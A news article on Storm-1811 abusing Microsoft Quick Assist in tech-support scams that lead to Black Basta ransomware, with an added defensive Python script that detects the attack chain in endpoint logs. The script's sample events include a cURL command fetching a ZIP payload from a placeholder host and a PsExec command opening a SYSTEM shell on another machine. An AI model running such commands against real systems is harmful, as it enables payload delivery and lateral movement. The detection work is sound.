Cybercriminals Utilize Microsoft Quick Assist Feature in Ransomware Attacks

The Microsoft Threat Intelligence team said it has observed a threat actor it tracks under the name Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks. "Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware," the company said in a report published on May 15, 2024.

The attack chain involves impersonation via voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the delivery of QakBot, Cobalt Strike, and ultimately Black Basta ransomware. "Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user's company to gain initial access to a target device," the tech giant said.

Quick Assist is a legitimate application from Microsoft that lets users share their Windows or macOS device with another person over a remote connection, mainly to troubleshoot technical problems on their systems. It comes installed by default on devices running Windows 11. To make the attacks more convincing, the threat actors first conduct link listing attacks, a type of email bombing attack in which the targeted email addresses are signed up for various legitimate email subscription services so that their inboxes are flooded with subscription content.

The adversary then masquerades as the company's IT support team via phone calls to the target user, offering to help remediate the spam problem and asking them to grant access to their device through Quick Assist. "Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads," the Windows maker said.

"Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network." Microsoft said it is keeping a close eye on the abuse of Quick Assist in these attacks and that it is working on adding warning messages to the software to alert users to possible tech support scams that could lead to ransomware delivery.
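The chain described above (Quick Assist session, then a cURL download of ZIP or batch files, then PsExec) is the kind of sequence a defender can correlate in endpoint process-creation telemetry. The script below is an added example written for this article, not code from Microsoft or Rapid7; the field names, process image names (QuickAssist.exe, curl.exe, PsExec.exe), the 30-minute window and the sample events are all constructed assumptions for illustration.

```python
# Added example: correlate process-creation events for the
# Quick Assist -> cURL download -> PsExec chain described in the article.
# Field names, process names and the sample events are constructed
# assumptions for illustration, not telemetry from the reported campaign.
from datetime import datetime, timedelta

# Constructed sample events, Sysmon Event ID 1 style (ts, host, image, cmd).
EVENTS = [
    {"ts": "2024-05-15T13:02:10", "host": "WS01",
     "image": r"C:\Windows\System32\QuickAssist.exe", "cmd": "QuickAssist.exe"},
    {"ts": "2024-05-15T13:09:44", "host": "WS01",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl -o C:\\Users\\Public\\upd.zip https://example.invalid/upd.zip"},
    {"ts": "2024-05-15T13:15:02", "host": "WS01",
     "image": r"C:\Tools\PsExec.exe", "cmd": r"PsExec.exe \\FS01 -s cmd.exe"},
    # Benign: curl on another host with no Quick Assist session before it.
    {"ts": "2024-05-15T09:00:00", "host": "WS02",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl https://example.invalid/health"},
]

WINDOW = timedelta(minutes=30)            # assumed maximum gap between stages
PAYLOAD_HINTS = (".zip", ".bat", ".cmd")  # archive/batch artifacts named in the report

def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def find_chains(events, window=WINDOW):
    """Return {host: stages} for hosts where Quick Assist is followed, within
    `window`, by curl.exe fetching a ZIP/batch file; a later PsExec launch is
    recorded as a third stage. Hosts lacking the curl stage are omitted."""
    by_host = {}
    for e in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort lexically
        by_host.setdefault(e["host"], []).append(e)
    findings = {}
    for host, evs in by_host.items():
        last_time, stages = None, []
        for e in evs:
            t, name = datetime.fromisoformat(e["ts"]), _basename(e["image"])
            cmd = e["cmd"].lower()
            if name == "quickassist.exe":
                last_time, stages = t, ["quick_assist"]   # (re)start a candidate chain
            elif stages and t - last_time <= window:
                if name == "curl.exe" and "curl_download" not in stages \
                        and any(h in cmd for h in PAYLOAD_HINTS):
                    stages.append("curl_download"); last_time = t
                elif name in ("psexec.exe", "psexec64.exe") and "curl_download" in stages:
                    stages.append("psexec"); last_time = t
        if "curl_download" in stages:
            findings[host] = stages
    return findings

if __name__ == "__main__":
    for host, stages in find_chains(EVENTS).items():
        print(f"{host}: {' -> '.join(stages)}")
```

Because attackers routinely rename tools, a production rule would key the PsExec stage on the PSEXESVC service installation rather than on the image name.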

The campaign, believed to have begun in mid-April 2024, has targeted a variety of industries and verticals, including manufacturing, construction, food & beverage, and transportation, Rapid7 said, indicating the opportunistic nature of the attacks. "The low barrier of entry into performing these attacks, coupled with the significant impact these attacks have on their victims, continue to make ransomware a very effective means to an end for threat actors seeking a payday," Robert Knapp, senior manager of incident response services at Rapid7, said in a statement.